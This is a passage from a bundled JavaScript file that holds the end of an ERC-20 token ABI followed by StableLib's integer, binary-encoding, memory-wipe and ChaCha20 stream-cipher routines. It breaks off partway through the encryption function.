                    name: "",
                    type: "uint256"
                }
            ],
            stateMutability: "view",
            type: "function"
        },
        {
            inputs: [
                {
                    internalType: "address",
                    name: "recipient",
                    type: "address"
                },
                {
                    internalType: "uint256",
                    name: "amount",
                    type: "uint256"
                }
            ],
            name: "transfer",
            outputs: [
                {
                    internalType: "bool",
                    name: "",
                    type: "bool"
                }
            ],
            stateMutability: "nonpayable",
            type: "function"
        },
        {
            inputs: [
                {
                    internalType: "address",
                    name: "sender",
                    type: "address"
                },
                {
                    internalType: "address",
                    name: "recipient",
                    type: "address"
                },
                {
                    internalType: "uint256",
                    name: "amount",
                    type: "uint256"
                }
            ],
            name: "transferFrom",
            outputs: [
                {
                    internalType: "bool",
                    name: "",
                    type: "bool"
                }
            ],
            stateMutability: "nonpayable",
            type: "function"
        }
    ];
}



var $7etJZ = parcelRequire("7etJZ");
var $1ca962bc0b1868f1$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($1ca962bc0b1868f1$exports, "__esModule", {
    value: true
});
var $3ca0635e21db662f$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($3ca0635e21db662f$exports, "__esModule", {
    value: true
});
var $ddd89ca0ca71c6d3$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($ddd89ca0ca71c6d3$exports, "__esModule", {
    value: true
});
var $51a3ca76628cc201$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($51a3ca76628cc201$exports, "__esModule", {
    value: true
});
/**
 * Package int provides helper functions for integerss.
 */ // Shim using 16-bit pieces.
function $51a3ca76628cc201$var$imulShim(a, b) {
    var ah = a >>> 16 & 0xffff, al = a & 0xffff;
    var bh = b >>> 16 & 0xffff, bl = b & 0xffff;
    return al * bl + (ah * bl + al * bh << 16 >>> 0) | 0;
}
/** 32-bit integer multiplication.  */ // Use system Math.imul if available, otherwise use our shim.
$51a3ca76628cc201$exports.mul = Math.imul || $51a3ca76628cc201$var$imulShim;
/** 32-bit integer addition.  */ function $51a3ca76628cc201$var$add(a, b) {
    return a + b | 0;
}
$51a3ca76628cc201$exports.add = $51a3ca76628cc201$var$add;
/**  32-bit integer subtraction.  */ function $51a3ca76628cc201$var$sub(a, b) {
    return a - b | 0;
}
$51a3ca76628cc201$exports.sub = $51a3ca76628cc201$var$sub;
/** 32-bit integer left rotation */ function $51a3ca76628cc201$var$rotl(x, n) {
    return x << n | x >>> 32 - n;
}
$51a3ca76628cc201$exports.rotl = $51a3ca76628cc201$var$rotl;
/** 32-bit integer left rotation */ function $51a3ca76628cc201$var$rotr(x, n) {
    return x << 32 - n | x >>> n;
}
$51a3ca76628cc201$exports.rotr = $51a3ca76628cc201$var$rotr;
function $51a3ca76628cc201$var$isIntegerShim(n) {
    return typeof n === "number" && isFinite(n) && Math.floor(n) === n;
}
/**
 * Returns true if the argument is an integer number.
 *
 * In ES2015, Number.isInteger.
 */ $51a3ca76628cc201$exports.isInteger = Number.isInteger || $51a3ca76628cc201$var$isIntegerShim;
/**
 *  Math.pow(2, 53) - 1
 *
 *  In ES2015 Number.MAX_SAFE_INTEGER.
 */ $51a3ca76628cc201$exports.MAX_SAFE_INTEGER = 9007199254740991;
/**
 * Returns true if the argument is a safe integer number
 * (-MIN_SAFE_INTEGER < number <= MAX_SAFE_INTEGER)
 *
 * In ES2015, Number.isSafeInteger.
 */ $51a3ca76628cc201$exports.isSafeInteger = function(n) {
    return $51a3ca76628cc201$exports.isInteger(n) && n >= -$51a3ca76628cc201$exports.MAX_SAFE_INTEGER && n <= $51a3ca76628cc201$exports.MAX_SAFE_INTEGER;
};


// TODO(dchest): add asserts for correct value ranges and array offsets.
/**
 * Reads 2 bytes from array starting at offset as big-endian
 * signed 16-bit integer and returns it.
 */ function $ddd89ca0ca71c6d3$var$readInt16BE(array, offset) {
    if (offset === void 0) offset = 0;
    return (array[offset + 0] << 8 | array[offset + 1]) << 16 >> 16;
}
$ddd89ca0ca71c6d3$exports.readInt16BE = $ddd89ca0ca71c6d3$var$readInt16BE;
/**
 * Reads 2 bytes from array starting at offset as big-endian
 * unsigned 16-bit integer and returns it.
 */ function $ddd89ca0ca71c6d3$var$readUint16BE(array, offset) {
    if (offset === void 0) offset = 0;
    return (array[offset + 0] << 8 | array[offset + 1]) >>> 0;
}
$ddd89ca0ca71c6d3$exports.readUint16BE = $ddd89ca0ca71c6d3$var$readUint16BE;
/**
 * Reads 2 bytes from array starting at offset as little-endian
 * signed 16-bit integer and returns it.
 */ function $ddd89ca0ca71c6d3$var$readInt16LE(array, offset) {
    if (offset === void 0) offset = 0;
    return (array[offset + 1] << 8 | array[offset]) << 16 >> 16;
}
$ddd89ca0ca71c6d3$exports.readInt16LE = $ddd89ca0ca71c6d3$var$readInt16LE;
/**
 * Reads 2 bytes from array starting at offset as little-endian
 * unsigned 16-bit integer and returns it.
 */ function $ddd89ca0ca71c6d3$var$readUint16LE(array, offset) {
    if (offset === void 0) offset = 0;
    return (array[offset + 1] << 8 | array[offset]) >>> 0;
}
$ddd89ca0ca71c6d3$exports.readUint16LE = $ddd89ca0ca71c6d3$var$readUint16LE;
/**
 * Writes 2-byte big-endian representation of 16-bit unsigned
 * value to byte array starting at offset.
 *
 * If byte array is not given, creates a new 2-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeUint16BE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(2);
    if (offset === void 0) offset = 0;
    out[offset + 0] = value >>> 8;
    out[offset + 1] = value >>> 0;
    return out;
}
$ddd89ca0ca71c6d3$exports.writeUint16BE = $ddd89ca0ca71c6d3$var$writeUint16BE;
$ddd89ca0ca71c6d3$exports.writeInt16BE = $ddd89ca0ca71c6d3$var$writeUint16BE;
/**
 * Writes 2-byte little-endian representation of 16-bit unsigned
 * value to array starting at offset.
 *
 * If byte array is not given, creates a new 2-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeUint16LE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(2);
    if (offset === void 0) offset = 0;
    out[offset + 0] = value >>> 0;
    out[offset + 1] = value >>> 8;
    return out;
}
$ddd89ca0ca71c6d3$exports.writeUint16LE = $ddd89ca0ca71c6d3$var$writeUint16LE;
$ddd89ca0ca71c6d3$exports.writeInt16LE = $ddd89ca0ca71c6d3$var$writeUint16LE;
/**
 * Reads 4 bytes from array starting at offset as big-endian
 * signed 32-bit integer and returns it.
 */ function $ddd89ca0ca71c6d3$var$readInt32BE(array, offset) {
    if (offset === void 0) offset = 0;
    return array[offset] << 24 | array[offset + 1] << 16 | array[offset + 2] << 8 | array[offset + 3];
}
$ddd89ca0ca71c6d3$exports.readInt32BE = $ddd89ca0ca71c6d3$var$readInt32BE;
/**
 * Reads 4 bytes from array starting at offset as big-endian
 * unsigned 32-bit integer and returns it.
 */ function $ddd89ca0ca71c6d3$var$readUint32BE(array, offset) {
    if (offset === void 0) offset = 0;
    return (array[offset] << 24 | array[offset + 1] << 16 | array[offset + 2] << 8 | array[offset + 3]) >>> 0;
}
$ddd89ca0ca71c6d3$exports.readUint32BE = $ddd89ca0ca71c6d3$var$readUint32BE;
/**
 * Reads 4 bytes from array starting at offset as little-endian
 * signed 32-bit integer and returns it.
 */ function $ddd89ca0ca71c6d3$var$readInt32LE(array, offset) {
    if (offset === void 0) offset = 0;
    return array[offset + 3] << 24 | array[offset + 2] << 16 | array[offset + 1] << 8 | array[offset];
}
$ddd89ca0ca71c6d3$exports.readInt32LE = $ddd89ca0ca71c6d3$var$readInt32LE;
/**
 * Reads 4 bytes from array starting at offset as little-endian
 * unsigned 32-bit integer and returns it.
 */ function $ddd89ca0ca71c6d3$var$readUint32LE(array, offset) {
    if (offset === void 0) offset = 0;
    return (array[offset + 3] << 24 | array[offset + 2] << 16 | array[offset + 1] << 8 | array[offset]) >>> 0;
}
$ddd89ca0ca71c6d3$exports.readUint32LE = $ddd89ca0ca71c6d3$var$readUint32LE;
/**
 * Writes 4-byte big-endian representation of 32-bit unsigned
 * value to byte array starting at offset.
 *
 * If byte array is not given, creates a new 4-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeUint32BE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(4);
    if (offset === void 0) offset = 0;
    out[offset + 0] = value >>> 24;
    out[offset + 1] = value >>> 16;
    out[offset + 2] = value >>> 8;
    out[offset + 3] = value >>> 0;
    return out;
}
$ddd89ca0ca71c6d3$exports.writeUint32BE = $ddd89ca0ca71c6d3$var$writeUint32BE;
$ddd89ca0ca71c6d3$exports.writeInt32BE = $ddd89ca0ca71c6d3$var$writeUint32BE;
/**
 * Writes 4-byte little-endian representation of 32-bit unsigned
 * value to array starting at offset.
 *
 * If byte array is not given, creates a new 4-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeUint32LE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(4);
    if (offset === void 0) offset = 0;
    out[offset + 0] = value >>> 0;
    out[offset + 1] = value >>> 8;
    out[offset + 2] = value >>> 16;
    out[offset + 3] = value >>> 24;
    return out;
}
$ddd89ca0ca71c6d3$exports.writeUint32LE = $ddd89ca0ca71c6d3$var$writeUint32LE;
$ddd89ca0ca71c6d3$exports.writeInt32LE = $ddd89ca0ca71c6d3$var$writeUint32LE;
/**
 * Reads 8 bytes from array starting at offset as big-endian
 * signed 64-bit integer and returns it.
 *
 * IMPORTANT: due to JavaScript limitation, supports exact
 * numbers in range -9007199254740991 to 9007199254740991.
 * If the number stored in the byte array is outside this range,
 * the result is not exact.
 */ function $ddd89ca0ca71c6d3$var$readInt64BE(array, offset) {
    if (offset === void 0) offset = 0;
    var hi = $ddd89ca0ca71c6d3$var$readInt32BE(array, offset);
    var lo = $ddd89ca0ca71c6d3$var$readInt32BE(array, offset + 4);
    return hi * 0x100000000 + lo - (lo >> 31) * 0x100000000;
}
$ddd89ca0ca71c6d3$exports.readInt64BE = $ddd89ca0ca71c6d3$var$readInt64BE;
/**
 * Reads 8 bytes from array starting at offset as big-endian
 * unsigned 64-bit integer and returns it.
 *
 * IMPORTANT: due to JavaScript limitation, supports values up to 2^53-1.
 */ function $ddd89ca0ca71c6d3$var$readUint64BE(array, offset) {
    if (offset === void 0) offset = 0;
    var hi = $ddd89ca0ca71c6d3$var$readUint32BE(array, offset);
    var lo = $ddd89ca0ca71c6d3$var$readUint32BE(array, offset + 4);
    return hi * 0x100000000 + lo;
}
$ddd89ca0ca71c6d3$exports.readUint64BE = $ddd89ca0ca71c6d3$var$readUint64BE;
/**
 * Reads 8 bytes from array starting at offset as little-endian
 * signed 64-bit integer and returns it.
 *
 * IMPORTANT: due to JavaScript limitation, supports exact
 * numbers in range -9007199254740991 to 9007199254740991.
 * If the number stored in the byte array is outside this range,
 * the result is not exact.
 */ function $ddd89ca0ca71c6d3$var$readInt64LE(array, offset) {
    if (offset === void 0) offset = 0;
    var lo = $ddd89ca0ca71c6d3$var$readInt32LE(array, offset);
    var hi = $ddd89ca0ca71c6d3$var$readInt32LE(array, offset + 4);
    return hi * 0x100000000 + lo - (lo >> 31) * 0x100000000;
}
$ddd89ca0ca71c6d3$exports.readInt64LE = $ddd89ca0ca71c6d3$var$readInt64LE;
/**
 * Reads 8 bytes from array starting at offset as little-endian
 * unsigned 64-bit integer and returns it.
 *
 * IMPORTANT: due to JavaScript limitation, supports values up to 2^53-1.
 */ function $ddd89ca0ca71c6d3$var$readUint64LE(array, offset) {
    if (offset === void 0) offset = 0;
    var lo = $ddd89ca0ca71c6d3$var$readUint32LE(array, offset);
    var hi = $ddd89ca0ca71c6d3$var$readUint32LE(array, offset + 4);
    return hi * 0x100000000 + lo;
}
$ddd89ca0ca71c6d3$exports.readUint64LE = $ddd89ca0ca71c6d3$var$readUint64LE;
/**
 * Writes 8-byte big-endian representation of 64-bit unsigned
 * value to byte array starting at offset.
 *
 * Due to JavaScript limitation, supports values up to 2^53-1.
 *
 * If byte array is not given, creates a new 8-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeUint64BE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(8);
    if (offset === void 0) offset = 0;
    $ddd89ca0ca71c6d3$var$writeUint32BE(value / 0x100000000 >>> 0, out, offset);
    $ddd89ca0ca71c6d3$var$writeUint32BE(value >>> 0, out, offset + 4);
    return out;
}
$ddd89ca0ca71c6d3$exports.writeUint64BE = $ddd89ca0ca71c6d3$var$writeUint64BE;
$ddd89ca0ca71c6d3$exports.writeInt64BE = $ddd89ca0ca71c6d3$var$writeUint64BE;
/**
 * Writes 8-byte little-endian representation of 64-bit unsigned
 * value to byte array starting at offset.
 *
 * Due to JavaScript limitation, supports values up to 2^53-1.
 *
 * If byte array is not given, creates a new 8-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeUint64LE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(8);
    if (offset === void 0) offset = 0;
    $ddd89ca0ca71c6d3$var$writeUint32LE(value >>> 0, out, offset);
    $ddd89ca0ca71c6d3$var$writeUint32LE(value / 0x100000000 >>> 0, out, offset + 4);
    return out;
}
$ddd89ca0ca71c6d3$exports.writeUint64LE = $ddd89ca0ca71c6d3$var$writeUint64LE;
$ddd89ca0ca71c6d3$exports.writeInt64LE = $ddd89ca0ca71c6d3$var$writeUint64LE;
/**
 * Reads bytes from array starting at offset as big-endian
 * unsigned bitLen-bit integer and returns it.
 *
 * Supports bit lengths divisible by 8, up to 48.
 */ function $ddd89ca0ca71c6d3$var$readUintBE(bitLength, array, offset) {
    if (offset === void 0) offset = 0;
    // TODO(dchest): implement support for bitLengths non-divisible by 8
    if (bitLength % 8 !== 0) throw new Error("readUintBE supports only bitLengths divisible by 8");
    if (bitLength / 8 > array.length - offset) throw new Error("readUintBE: array is too short for the given bitLength");
    var result = 0;
    var mul = 1;
    for(var i = bitLength / 8 + offset - 1; i >= offset; i--){
        result += array[i] * mul;
        mul *= 256;
    }
    return result;
}
$ddd89ca0ca71c6d3$exports.readUintBE = $ddd89ca0ca71c6d3$var$readUintBE;
/**
 * Reads bytes from array starting at offset as little-endian
 * unsigned bitLen-bit integer and returns it.
 *
 * Supports bit lengths divisible by 8, up to 48.
 */ function $ddd89ca0ca71c6d3$var$readUintLE(bitLength, array, offset) {
    if (offset === void 0) offset = 0;
    // TODO(dchest): implement support for bitLengths non-divisible by 8
    if (bitLength % 8 !== 0) throw new Error("readUintLE supports only bitLengths divisible by 8");
    if (bitLength / 8 > array.length - offset) throw new Error("readUintLE: array is too short for the given bitLength");
    var result = 0;
    var mul = 1;
    for(var i = offset; i < offset + bitLength / 8; i++){
        result += array[i] * mul;
        mul *= 256;
    }
    return result;
}
$ddd89ca0ca71c6d3$exports.readUintLE = $ddd89ca0ca71c6d3$var$readUintLE;
/**
 * Writes a big-endian representation of bitLen-bit unsigned
 * value to array starting at offset.
 *
 * Supports bit lengths divisible by 8, up to 48.
 *
 * If byte array is not given, creates a new one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeUintBE(bitLength, value, out, offset) {
    if (out === void 0) out = new Uint8Array(bitLength / 8);
    if (offset === void 0) offset = 0;
    // TODO(dchest): implement support for bitLengths non-divisible by 8
    if (bitLength % 8 !== 0) throw new Error("writeUintBE supports only bitLengths divisible by 8");
    if (!$51a3ca76628cc201$exports.isSafeInteger(value)) throw new Error("writeUintBE value must be an integer");
    var div = 1;
    for(var i = bitLength / 8 + offset - 1; i >= offset; i--){
        out[i] = value / div & 0xff;
        div *= 256;
    }
    return out;
}
$ddd89ca0ca71c6d3$exports.writeUintBE = $ddd89ca0ca71c6d3$var$writeUintBE;
/**
 * Writes a little-endian representation of bitLen-bit unsigned
 * value to array starting at offset.
 *
 * Supports bit lengths divisible by 8, up to 48.
 *
 * If byte array is not given, creates a new one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeUintLE(bitLength, value, out, offset) {
    if (out === void 0) out = new Uint8Array(bitLength / 8);
    if (offset === void 0) offset = 0;
    // TODO(dchest): implement support for bitLengths non-divisible by 8
    if (bitLength % 8 !== 0) throw new Error("writeUintLE supports only bitLengths divisible by 8");
    if (!$51a3ca76628cc201$exports.isSafeInteger(value)) throw new Error("writeUintLE value must be an integer");
    var div = 1;
    for(var i = offset; i < offset + bitLength / 8; i++){
        out[i] = value / div & 0xff;
        div *= 256;
    }
    return out;
}
$ddd89ca0ca71c6d3$exports.writeUintLE = $ddd89ca0ca71c6d3$var$writeUintLE;
/**
 * Reads 4 bytes from array starting at offset as big-endian
 * 32-bit floating-point number and returns it.
 */ function $ddd89ca0ca71c6d3$var$readFloat32BE(array, offset) {
    if (offset === void 0) offset = 0;
    var view = new DataView(array.buffer, array.byteOffset, array.byteLength);
    return view.getFloat32(offset);
}
$ddd89ca0ca71c6d3$exports.readFloat32BE = $ddd89ca0ca71c6d3$var$readFloat32BE;
/**
 * Reads 4 bytes from array starting at offset as little-endian
 * 32-bit floating-point number and returns it.
 */ function $ddd89ca0ca71c6d3$var$readFloat32LE(array, offset) {
    if (offset === void 0) offset = 0;
    var view = new DataView(array.buffer, array.byteOffset, array.byteLength);
    return view.getFloat32(offset, true);
}
$ddd89ca0ca71c6d3$exports.readFloat32LE = $ddd89ca0ca71c6d3$var$readFloat32LE;
/**
 * Reads 8 bytes from array starting at offset as big-endian
 * 64-bit floating-point number ("double") and returns it.
 */ function $ddd89ca0ca71c6d3$var$readFloat64BE(array, offset) {
    if (offset === void 0) offset = 0;
    var view = new DataView(array.buffer, array.byteOffset, array.byteLength);
    return view.getFloat64(offset);
}
$ddd89ca0ca71c6d3$exports.readFloat64BE = $ddd89ca0ca71c6d3$var$readFloat64BE;
/**
 * Reads 8 bytes from array starting at offset as little-endian
 * 64-bit floating-point number ("double") and returns it.
 */ function $ddd89ca0ca71c6d3$var$readFloat64LE(array, offset) {
    if (offset === void 0) offset = 0;
    var view = new DataView(array.buffer, array.byteOffset, array.byteLength);
    return view.getFloat64(offset, true);
}
$ddd89ca0ca71c6d3$exports.readFloat64LE = $ddd89ca0ca71c6d3$var$readFloat64LE;
/**
 * Writes 4-byte big-endian floating-point representation of value
 * to byte array starting at offset.
 *
 * If byte array is not given, creates a new 4-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeFloat32BE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(4);
    if (offset === void 0) offset = 0;
    var view = new DataView(out.buffer, out.byteOffset, out.byteLength);
    view.setFloat32(offset, value);
    return out;
}
$ddd89ca0ca71c6d3$exports.writeFloat32BE = $ddd89ca0ca71c6d3$var$writeFloat32BE;
/**
 * Writes 4-byte little-endian floating-point representation of value
 * to byte array starting at offset.
 *
 * If byte array is not given, creates a new 4-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeFloat32LE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(4);
    if (offset === void 0) offset = 0;
    var view = new DataView(out.buffer, out.byteOffset, out.byteLength);
    view.setFloat32(offset, value, true);
    return out;
}
$ddd89ca0ca71c6d3$exports.writeFloat32LE = $ddd89ca0ca71c6d3$var$writeFloat32LE;
/**
 * Writes 8-byte big-endian floating-point representation of value
 * to byte array starting at offset.
 *
 * If byte array is not given, creates a new 8-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeFloat64BE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(8);
    if (offset === void 0) offset = 0;
    var view = new DataView(out.buffer, out.byteOffset, out.byteLength);
    view.setFloat64(offset, value);
    return out;
}
$ddd89ca0ca71c6d3$exports.writeFloat64BE = $ddd89ca0ca71c6d3$var$writeFloat64BE;
/**
 * Writes 8-byte little-endian floating-point representation of value
 * to byte array starting at offset.
 *
 * If byte array is not given, creates a new 8-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeFloat64LE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(8);
    if (offset === void 0) offset = 0;
    var view = new DataView(out.buffer, out.byteOffset, out.byteLength);
    view.setFloat64(offset, value, true);
    return out;
}
$ddd89ca0ca71c6d3$exports.writeFloat64LE = $ddd89ca0ca71c6d3$var$writeFloat64LE;


var $276678191c4bdb56$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($276678191c4bdb56$exports, "__esModule", {
    value: true
});
/**
 * Sets all values in the given array to zero and returns it.
 *
 * The fact that it sets bytes to zero can be relied on.
 *
 * There is no guarantee that this function makes data disappear from memory,
 * as runtime implementation can, for example, have copying garbage collector
 * that will make copies of sensitive data before we wipe it. Or that an
 * operating system will write our data to swap or sleep image. Another thing
 * is that an optimizing compiler can remove calls to this function or make it
 * no-op. There's nothing we can do with it, so we just do our best and hope
 * that everything will be okay and good will triumph over evil.
 */ function $276678191c4bdb56$var$wipe(array) {
    // Right now it's similar to array.fill(0). If it turns
    // out that runtimes optimize this call away, maybe
    // we can try something else.
    for(var i = 0; i < array.length; i++)array[i] = 0;
    return array;
}
$276678191c4bdb56$exports.wipe = $276678191c4bdb56$var$wipe;


// Number of ChaCha rounds (ChaCha20).
var $3ca0635e21db662f$var$ROUNDS = 20;
// Applies the ChaCha core function to 16-byte input,
// 32-byte key key, and puts the result into 64-byte array out.
function $3ca0635e21db662f$var$core(out, input, key) {
    var j0 = 0x61707865; // "expa"  -- ChaCha's "sigma" constant
    var j1 = 0x3320646E; // "nd 3"     for 32-byte keys
    var j2 = 0x79622D32; // "2-by"
    var j3 = 0x6B206574; // "te k"
    var j4 = key[3] << 24 | key[2] << 16 | key[1] << 8 | key[0];
    var j5 = key[7] << 24 | key[6] << 16 | key[5] << 8 | key[4];
    var j6 = key[11] << 24 | key[10] << 16 | key[9] << 8 | key[8];
    var j7 = key[15] << 24 | key[14] << 16 | key[13] << 8 | key[12];
    var j8 = key[19] << 24 | key[18] << 16 | key[17] << 8 | key[16];
    var j9 = key[23] << 24 | key[22] << 16 | key[21] << 8 | key[20];
    var j10 = key[27] << 24 | key[26] << 16 | key[25] << 8 | key[24];
    var j11 = key[31] << 24 | key[30] << 16 | key[29] << 8 | key[28];
    var j12 = input[3] << 24 | input[2] << 16 | input[1] << 8 | input[0];
    var j13 = input[7] << 24 | input[6] << 16 | input[5] << 8 | input[4];
    var j14 = input[11] << 24 | input[10] << 16 | input[9] << 8 | input[8];
    var j15 = input[15] << 24 | input[14] << 16 | input[13] << 8 | input[12];
    var x0 = j0;
    var x1 = j1;
    var x2 = j2;
    var x3 = j3;
    var x4 = j4;
    var x5 = j5;
    var x6 = j6;
    var x7 = j7;
    var x8 = j8;
    var x9 = j9;
    var x10 = j10;
    var x11 = j11;
    var x12 = j12;
    var x13 = j13;
    var x14 = j14;
    var x15 = j15;
    for(var i = 0; i < $3ca0635e21db662f$var$ROUNDS; i += 2){
        x0 = x0 + x4 | 0;
        x12 ^= x0;
        x12 = x12 >>> 16 | x12 << 16;
        x8 = x8 + x12 | 0;
        x4 ^= x8;
        x4 = x4 >>> 20 | x4 << 12;
        x1 = x1 + x5 | 0;
        x13 ^= x1;
        x13 = x13 >>> 16 | x13 << 16;
        x9 = x9 + x13 | 0;
        x5 ^= x9;
        x5 = x5 >>> 20 | x5 << 12;
        x2 = x2 + x6 | 0;
        x14 ^= x2;
        x14 = x14 >>> 16 | x14 << 16;
        x10 = x10 + x14 | 0;
        x6 ^= x10;
        x6 = x6 >>> 20 | x6 << 12;
        x3 = x3 + x7 | 0;
        x15 ^= x3;
        x15 = x15 >>> 16 | x15 << 16;
        x11 = x11 + x15 | 0;
        x7 ^= x11;
        x7 = x7 >>> 20 | x7 << 12;
        x2 = x2 + x6 | 0;
        x14 ^= x2;
        x14 = x14 >>> 24 | x14 << 8;
        x10 = x10 + x14 | 0;
        x6 ^= x10;
        x6 = x6 >>> 25 | x6 << 7;
        x3 = x3 + x7 | 0;
        x15 ^= x3;
        x15 = x15 >>> 24 | x15 << 8;
        x11 = x11 + x15 | 0;
        x7 ^= x11;
        x7 = x7 >>> 25 | x7 << 7;
        x1 = x1 + x5 | 0;
        x13 ^= x1;
        x13 = x13 >>> 24 | x13 << 8;
        x9 = x9 + x13 | 0;
        x5 ^= x9;
        x5 = x5 >>> 25 | x5 << 7;
        x0 = x0 + x4 | 0;
        x12 ^= x0;
        x12 = x12 >>> 24 | x12 << 8;
        x8 = x8 + x12 | 0;
        x4 ^= x8;
        x4 = x4 >>> 25 | x4 << 7;
        x0 = x0 + x5 | 0;
        x15 ^= x0;
        x15 = x15 >>> 16 | x15 << 16;
        x10 = x10 + x15 | 0;
        x5 ^= x10;
        x5 = x5 >>> 20 | x5 << 12;
        x1 = x1 + x6 | 0;
        x12 ^= x1;
        x12 = x12 >>> 16 | x12 << 16;
        x11 = x11 + x12 | 0;
        x6 ^= x11;
        x6 = x6 >>> 20 | x6 << 12;
        x2 = x2 + x7 | 0;
        x13 ^= x2;
        x13 = x13 >>> 16 | x13 << 16;
        x8 = x8 + x13 | 0;
        x7 ^= x8;
        x7 = x7 >>> 20 | x7 << 12;
        x3 = x3 + x4 | 0;
        x14 ^= x3;
        x14 = x14 >>> 16 | x14 << 16;
        x9 = x9 + x14 | 0;
        x4 ^= x9;
        x4 = x4 >>> 20 | x4 << 12;
        x2 = x2 + x7 | 0;
        x13 ^= x2;
        x13 = x13 >>> 24 | x13 << 8;
        x8 = x8 + x13 | 0;
        x7 ^= x8;
        x7 = x7 >>> 25 | x7 << 7;
        x3 = x3 + x4 | 0;
        x14 ^= x3;
        x14 = x14 >>> 24 | x14 << 8;
        x9 = x9 + x14 | 0;
        x4 ^= x9;
        x4 = x4 >>> 25 | x4 << 7;
        x1 = x1 + x6 | 0;
        x12 ^= x1;
        x12 = x12 >>> 24 | x12 << 8;
        x11 = x11 + x12 | 0;
        x6 ^= x11;
        x6 = x6 >>> 25 | x6 << 7;
        x0 = x0 + x5 | 0;
        x15 ^= x0;
        x15 = x15 >>> 24 | x15 << 8;
        x10 = x10 + x15 | 0;
        x5 ^= x10;
        x5 = x5 >>> 25 | x5 << 7;
    }
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x0 + j0 | 0, out, 0);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x1 + j1 | 0, out, 4);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x2 + j2 | 0, out, 8);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x3 + j3 | 0, out, 12);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x4 + j4 | 0, out, 16);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x5 + j5 | 0, out, 20);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x6 + j6 | 0, out, 24);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x7 + j7 | 0, out, 28);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x8 + j8 | 0, out, 32);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x9 + j9 | 0, out, 36);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x10 + j10 | 0, out, 40);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x11 + j11 | 0, out, 44);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x12 + j12 | 0, out, 48);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x13 + j13 | 0, out, 52);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x14 + j14 | 0, out, 56);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x15 + j15 | 0, out, 60);
}
/**
 * Encrypt src with ChaCha20 stream generated for the given 32-byte key and
 * 8-byte (as in original implementation) or 12-byte (as in RFC7539) nonce and
 * write the result into dst and return it.
 *
 * dst and src may be the same, but otherwise must not overlap.
 *
 * If nonce is 12 bytes, users should not encrypt more than 256 GiB with the
 * same key and nonce, otherwise the stream will repeat. The function will
 * throw error if counter overflows to prevent this.
 *
 * If nonce is 8 bytes, the output is practically unlimited (2^70 bytes, which
 * is more than a million petabytes). However, it is not recommended to
 * generate 8-byte nonces randomly, as the chance of collision is high.
 *
 * Never use the same key and nonce to encrypt more than one message.
 *
 * If nonceInplaceCounterLength is not 0, the nonce is assumed to be a 16-byte
 * array with stream counter in first nonceInplaceCounterLength bytes and nonce
 * in the last remaining bytes. The counter will be incremented inplace for
 * each ChaCha block. This is useful if you need to encrypt one stream of data
 * in chunks.
 */ function $3ca0635e21db662f$var$streamXOR(key, nonce, src, dst, nonceInplaceCounterLength) {
    if (nonceInplaceCounterLength === void 0) nonceInplaceCounterLength = 0;
    // We only support 256-bit keys.
    if (key.length !== 32) throw new Error("ChaCha: key size must be 32 bytes");
    if (dst.length < src.length) throw new Error("ChaCha: destination is shorter than source");
    var nc;
    var counterLength;
    if (nonceInplaceCounterLength === 0) {
        if (nonce.length !== 8 && nonce.length !== 12) throw new Error("ChaCha nonce must be 8 or 12 bytes");
        nc = new Uint8Array(16);
        // First counterLength bytes of nc are counter, starting with zero.
        counterLength = nc.length - nonce.length;
        // Last bytes of nc after counterLength are nonce, set them.
        nc.set(nonce, counterLength);
    } else {
        if (nonce.length !== 16) throw new Error("ChaCha nonce with counter must be 16 bytes");
        // This will update passed nonce with counter inplace.
        nc = nonce;
        counterLength = nonceInplaceCounterLength;
    }
    // Allocate temporary space for ChaCha block.
    var block = new Uint8Array(64);
    for(var i = 0; i < src.length; i += 64){
        // Generate a block.
